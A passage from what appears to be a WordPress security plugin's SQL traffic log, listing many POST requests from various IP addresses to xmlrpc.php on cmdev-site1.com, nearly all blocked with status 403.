AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','d7fLvPMuJhyH2osZGYkb5VgA',0,1681168173.8562,1005,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','VACYg9tIjTvMZqLw0f8cioUN',0,1681168184.7220,785,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','3A2oOVJgYwUyaBEnQKXCmZs5',0,1681168187.7820,1668,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','Gyl0wa8Cbs4ETmSXrDoR1B7F',0,1681168190.9752,1483,'','POST',403,0,515,0,1,'',0),('68.183.225.173',1152901549,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','QjVIZFNfanMozxewKb1uHBkO',0,1681168198.0001,1321,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','R0LYZMTOil258kxt6KABWgzp',0,1681168206.4475,1334,'','POST',403,0,515,0,1,'',0),('62.244.200.74',1056229450,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','P39JS5sjoVvfK2LO0hqItbyl',0,1681168205.8006,2153,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','y9YnJjNPbwvXIM0iLzqdVmOf',0,1681168211.0792,604,'','POST',403,0,515,0,1,'',0),('91.207.102.163',1540318883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5vK2ipuEU8zcIyOg61bMWdGh',0,1681168434.6372,2950,'','POST',403,0,515,0,1,'',0),('213.152.162.99',3583550051,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','v1kAmnZcPSGtdMyRlKUVN8ij',0,1681169403.4364,5047,'','POST',403,0,515,0,1,'',0),('62.102.148.185',1046910137,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','C0fpoat3JVG4HvSNKdUZbxwP',0,1681169799.8352,3621,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dXxqwTm861WP2DySKtgVbnUN',0,1681170292.4008,4142,'','POST',403,0,515,0,1,'',0),('192.30.89.67',3223214403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3X5BZEW9LGwa2ebQ0iYPOFgl',0,1681171584.8176,4669,'','POST',403,0,515,0,1,'',0),('103.231.91.59',1743215419,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BcO7eWp0yFALSzux5QvMZ8KP',0,1681171622.3363,2754,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rJTg8q2m5kEuDOV0wRidKLWz',0,1681174884.1875,3960,'','POST',403,0,515,0,1,'',0),('37.120.132.91',628655195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','l1iTbKOv5dBp6M0Dm8xIZnrL',0,1681175150.1373,3497,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','9xVvGpg35IorbZXwSlKFNUst',0,1681176139.6308,4124,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','A9B4HaPwDUTyogmtk7VnKbOs',0,1681176143.3599,737,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','HzdouyXIL9NZp8EKqAiJDOBM',0,1681176149.2919,688,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','lpvq8jUdsmJeu4gfQTn0ABcD',0,1681176157.3724,2388,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ZTfws7mivCpALUVdFlQJuh1x',0,1681176164.2743,582,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','mh0kWnljOfDKvYC5LFs8Xyri',0,1681176166.9679,572,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','U46iuQFqLbJytneokfBhsrz1',0,1681176167.8297,605,'','POST',403,0,515,0,1,'',0),('89.238.150.43',1508808235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DkPlAJLhnBvxgIwCWHut6z0j',0,1681176190.0378,574,'','POST',403,0,515,0,1,'',0),('216.128.130.149',3632300693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','w1FNSlOboYzQ4ML9pg6WTqfj',0,1681177653.4945,697,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','dynw4GmeLKc0QOJkFBbvfZX7',0,1681177662.5943,683,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mV4UE3exqhLju9c8dSFsOXJr',0,1681177663.9538,661,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','YKenPLjQbT3E9pocy4sthUJf',0,1681177675.7118,574,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','NmXPEY2t3CyowrGVOD8IS7fF',0,1681177676.6786,594,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','FX6USD4Eb80o92BqkNxIeTs1',0,1681177678.1898,693,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fNOMgbH7ndquicDWmP5FrC80',0,1681178743.8149,4708,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','wA6C8tRfY0LUQh2gryFZ5cT1',0,1681178864.3628,2967,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','IsPbBM8Uvr6pylJ9xtOZWGwE',0,1681178874.6193,723,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','r4ehLO28gTkQjKRqod79vy1N',0,1681178875.9302,738,'','POST',403,0,515,0,1,'',0),('216.128.130.149',3632300693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','HUxrGcQIBkiXawATmMyLKCj7',0,1681178894.3701,2938,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','aTzBDou5MLtqlrYjRW4JXfEy',0,1681178898.2654,1041,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','ZXYlaEAUNb8vwhi3ocQ7t1Of',0,1681178909.2964,701,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','5LvDfGI7aMyJw8bsORimulg0',0,1681180294.3467,13098,'','POST',403,0,515,0,1,'',0),('94.237.124.100',1592622180,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','E9PWZpjSLhoR8DFyb4CAzTim',0,1681180301.1521,6295,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','l2jr0IOP1ystH4bcq3oWGDSu',0,1681180375.9427,4502,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','exyYuA4bN8qd2WMUDVc1aiSF',0,1681180387.3119,1930,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','UyX3OPjoHnScIdBYMx8fsEKG',0,1681180388.0400,2329,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','eEqPG5d1hwLpu0IZ2OsDbW6m',0,1681180399.5501,2652,'','POST',403,0,515,0,1,'',0),('103.133.215.217',1736824793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','08V2rBWCe17mogkfcYw3aKO6',0,1681180405.4631,707,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DZ3NwcHzeqXu9KdFYijlof6h',0,1681180408.7804,581,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','uXWAw0iEGtal8KMTmCoL1h5F',0,1681180411.6245,637,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','bMrhq7dJaGOVRK9m2TBCeXZN',0,1681180413.6131,609,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','9vnPj7uO6ehGsgx13XAFKw0C',0,1681180421.9257,559,'','POST',403,0,515,0,1,'',0),('213.152.162.15',3583549967,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bNFOShcXrjELRgJuq80yxDk1',0,1681180953.4221,4424,'','POST',403,0,515,0,1,'',0),('213.152.162.15',3583549967,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','r04I2lna1b9g5ZzK6dU7khje',0,1681181097.0769,3299,'','POST',403,0,515,0,1,'',0),('193.37.254.3',3240492547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RsuOSzgXTAQcyPDB1tNZx3Kh',0,1681181132.5855,684,'','POST',403,0,515,0,1,'',0),('213.152.161.10',3583549706,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','D0xqLhnZEp6kjlKBCuJm8f2t',0,1681183602.6029,5996,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','9soO0TF48XPrwNSMCvJdtu1E',0,1681184731.9341,4021,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','Y0upXeSqV2GcT5iEIKtOQbA4',0,1681184734.7615,2400,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','KeLoFxac0jquNsinRCStb9WU',0,1681184735.2506,2238,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','JWAIZsQPUqNEO8mYjCcdeiFp',0,1681184738.9167,621,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','czSXWAuIEtsrm1aex0qK27Cd',0,1681184746.0569,1497,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','WyHgSx8qp5iV1TJk0sbBMjLv',0,1681184746.4574,1334,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Cygv3BcWjYz8KJ2Ql4FIMAhV',0,1681184757.4738,657,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','cpJRZ4NkeP3tWaxn5oSwKibE',0,1681184758.3221,633,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','usxFwjTntipIOfhq7EDRMob4',0,1681184762.9619,645,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FQaA5S0ptBOGlg27NP93J8zx',0,1681185455.2506,3745,'','POST',403,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TzbMBAL0iwcRKY7pg4yexhJo',0,1681185654.8485,1841,'','POST',403,0,515,0,1,'',0),('185.209.196.221',3117532381,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','D7FxdyE0COwkpj1S3Gr6WXmz',0,1681185707.0979,709,'','POST',403,0,515,0,1,'',0),('185.209.196.221',3117532381,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','V8vFDeQGLgpSdbj7oTKrlMuC',0,1681185708.4807,649,'','POST',403,0,515,0,1,'',0),('185.209.196.221',3117532381,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','g8NDhPTWLRc9xH7XVZryd6a5',0,1681185709.6368,569,'','POST',404,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QyXiSxpn3G8uLhKFZM6TINd4',0,1681187313.6670,4434,'','POST',403,0,515,0,1,'',0),('137.63.71.51',2302625587,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZaXyIrojpbvNLSUYBGATJDOV',0,1681187491.9199,1392,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','65z7vhHmuVsS9G3p28Owy0lk',0,1681188254.7611,4385,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','zPTBIaiGm9e2tLO7oUlH0EX5',0,1681188253.8081,6345,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','r47hzlbs8IjYSeaC96fVWFHm',0,1681188262.4067,706,'','POST',403,0,515,0,1,'',0),('150.60.157.163',2520554915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Jk0to7U9OT6sEIBWeP4r8NFD',0,1681188263.6741,625,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','ANIo3yjzqvDYHK9M65CRlbUm',0,1681188274.9697,917,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','A0wNqx9m3KVJZvXdhLF1QY6H',0,1681188276.9479,840,'','POST',403,0,515,0,1,'',0),('200.58.110.37',3359272485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','SwmvGI6onDJeQbs49L0FMxiK',0,1681188286.2885,782,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','cSVop041mKLQHfvOrgdnhx2F',0,1681188291.4940,1473,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tS6CRjQqz1Z9xvXHVsgDu8rU',0,1681188781.4181,3590,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','KVi25qezdZFO3m8GPC7wyLIr',0,1681189896.3660,1346,'','POST',403,0,515,0,1,'',0),('147.182.163.125',2478220157,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','C14rcslW2ZRzo3xQOLiPDKHS',0,1681189901.8269,1188,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','hD4eub3RA2cpa6oOW1xlFH7t',0,1681189910.7553,1059,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','Ki6oR1kOla8GUCjYzZDJbTVH',0,1681189916.6738,1232,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 